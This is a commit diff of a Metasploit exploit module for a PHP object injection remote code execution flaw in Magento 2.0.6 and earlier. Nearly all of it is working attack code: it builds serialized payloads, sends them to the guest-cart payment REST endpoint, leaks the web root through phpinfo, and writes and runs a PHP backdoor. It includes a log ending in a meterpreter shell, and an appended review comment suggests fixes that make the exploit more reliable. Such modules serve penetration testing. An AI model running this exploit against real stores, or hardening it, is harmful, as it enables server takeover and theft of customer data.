Cosmetic changes for magento_unserialize to pass msftidy & guidelines

bug/bundler_fix
wchen-r7 2016-06-02 16:34:41 -05:00
parent 4f42cc8c08
commit 7c9227f70b
1 changed files with 56 additions and 38 deletions


@ -13,20 +13,22 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Magento <= 2.0.6 Unserialize Remote Code Execution',
'Name' => 'Magento 2.0.6 Unserialize Remote Code Execution',
'Description' => %q{
This module exploits a PHP object injection vulnerability in Magento <= 2.0.6
This module exploits a PHP object injection vulnerability in Magento 2.0.6
or prior.
},
'Platform' => 'php',
'License' => MSF_LICENSE,
'Author' => [
'Author' =>
[
'Netanel Rubin', # original discovery
'agix', # original exploit
'mr_me <mr_me@offensive-security.com>', # metasploit module
],
'mr_me <mr_me[at]offensive-security.com>', # metasploit module
],
'Payload' =>
{
'BadChars' => "\x22",
'BadChars' => "\x22",
},
'References' =>
[
@ -36,16 +38,21 @@ class MetasploitModule < Msf::Exploit::Remote
['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
],
'Arch' => ARCH_PHP,
'Targets' => [
'Targets' =>
[
[ 'Automatic Targeting', { 'auto' => true } ],
],
],
'DisclosureDate' => 'May 17 2016',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
], self.class)
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
], self.class)
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def get_phpinfo
@ -149,7 +156,8 @@ class MetasploitModule < Msf::Exploit::Remote
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
serialize << 's:11:\"\u0000*\u0000requests\";'
serialize << 'i:0;}'
return serialize
serialize
end
def get_phpshell
@ -252,14 +260,16 @@ class MetasploitModule < Msf::Exploit::Remote
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
serialize << 's:11:\"\u0000*\u0000requests\";'
serialize << 'i:0;}'
return serialize
serialize
end
def do_check
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
data << get_phpinfo
data << "\"}},\"email\":\"#{@email}\"}"
return send_request_cgi({
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
'ctype' => 'application/json',
@ -271,9 +281,9 @@ class MetasploitModule < Msf::Exploit::Remote
@phpsessid = Rex::Text.rand_text_alphanumeric(26)
@form_key = Rex::Text.rand_text_alphanumeric(26)
@cookies = "PHPSESSID=#{@phpsessid}; form_key=#{@form_key}"
@email = "#{@phpsessid}@#{@form_key}.com"
@email = "#{@phpsessid}@#{@form_key}.com"
end
def check
define_globals
# we actually exploit the bug, but just for a callback
@ -293,16 +303,19 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
end
rescue ::Rex::ConnectionError
rescue ::Rex::ConnectionError => e
vprint_error(e.message)
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def get_webroot
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
data << get_phpinfo
data << "\"}},\"email\":\"#{@email}\"}"
# we steal path via phpinfo
res = send_request_cgi({
'method' => 'POST',
@ -310,13 +323,15 @@ class MetasploitModule < Msf::Exploit::Remote
'ctype' => 'application/json',
'data' => data,
})
if res and res.code == 200
if res && res.code == 200
@webroot = "#{$1}" if res.body =~ /_SERVER\["DOCUMENT_ROOT"\]<\/td><td class="v">(.*)<\/td><\/tr>/
return true
end
return false
false
end
def create_fake_cart
res = send_request_cgi({
'method' => 'GET',
@ -325,10 +340,10 @@ class MetasploitModule < Msf::Exploit::Remote
'cookie' => @cookies,
'vars_get' => { 'form_key' => @form_key }
})
if (res and res.body.include?('[]'))
return true
end
return false
return true if (res && res.body.include?('[]'))
false
end
def generate_cart_id
@ -337,27 +352,29 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, '/checkout/cart/'),
'cookie' => @cookies,
})
if res and res.code == 200
if res && res.code == 200
@guest_cart_id = "#{$1}" if res.body =~ /entity_id":"(.*)","store_id":\d,"created_at/
return true
end
return false
false
end
def backdoor
data = "{\"paymentMethod\":{\"method\":\"checkmo\",\"additional_data\":{\"additional_information\":\""
data << get_phpshell
data << "\"}},\"email\":\"#{@email}\"}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
'ctype' => 'application/json',
'data' => data,
})
if (res && res.body.include?('true'))
return true
end
return false
return true if (res && res.body.include?('true'))
false
end
def exec_code
@ -366,21 +383,22 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "/#{@backdoor}"),
}, timeout = 0.5)
end
def exploit
define_globals
@backdoor = "#{Rex::Text.rand_text_alphanumeric(26)}.php"
register_files_for_cleanup("#{@backdoor}")
if create_fake_cart && generate_cart_id
print_good("generated a guest cart id")
if get_webroot
if backdoor
print_good("backdoor done!")
exec_code
end
if get_webroot && backdoor
print_good("backdoor done!")
exec_code
end
end
end
end
=begin
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/sam.rc
[*] Processing scripts/sam.rc for ERB directives.
@ -404,4 +422,4 @@ resource (scripts/sam.rc)> exploit
[+] Deleted vYtP1aJ2NXYAovrQgOLNGCt0SZ.php
meterpreter >
=end
=end
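Review bot: `get_webroot` (hunk @ -310,13 +323,15) returns true on any 200 response even when the DOCUMENT_ROOT regex does not match and `@webroot` stays nil, so `exploit` goes on to call `backdoor` with an unset web root; `generate_cart_id` has the same shape, letting `@guest_cart_id` stay nil and yielding a `/rest/V1/guest-carts//set-payment-information` URI in `do_check`/`backdoor`. Tie the success value to the extraction instead: replace `return true` with `return !@webroot.nil?` in `get_webroot` and with `return !@guest_cart_id.nil?` in `generate_cart_id`, and have `exploit` report the failed step with `fail_with(Failure::Unknown, 'Could not determine the web root')` rather than ending silently when `get_webroot` or `backdoor` is false. The phpinfo capture uses a greedy `(.*)`; that is fine while the row is on one line, but `(.*?)` is the safer form if the table layout differs across PHP builds. Unrelated to this commit but visible in the same section, the `check` rescue at @ -293,16 +303,19 returns `CheckCode::Safe` on a `Rex::ConnectionError`, where `CheckCode::Unknown` would avoid reporting an unreachable host as not vulnerable; the `begin` of that block is outside the hunk.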